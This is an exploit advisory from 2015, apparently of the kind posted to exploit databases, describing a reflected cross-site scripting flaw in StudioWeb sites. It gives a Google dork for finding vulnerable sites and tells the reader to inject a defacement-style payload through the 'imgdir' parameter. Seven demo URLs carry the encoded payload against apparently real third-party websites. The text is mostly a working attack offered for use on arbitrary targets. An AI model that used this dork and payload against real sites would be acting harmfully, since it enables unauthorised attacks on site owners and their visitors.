########################################################
# Exploit Title: StudioWeb/Cross Site Scripting(XSS)
########################################################
# Google Dork: inurl:"poto" intext:"powered by StudioWeb "
# You Can Make Another Dork For This Bug
# Date: [15/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://www.studioweb.com/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.
# That sites Have XSS Or Cross Site Scripting Bug.
# Please Enter Dork In Google And Open Your Target.
# Then add This Script
# ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>]
# In Target after Yhis Section
# [index.php?imgdir=]
# Then You See That Your Script Accomplished.
# GooD LucK
########################################################
# Demo:
# http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################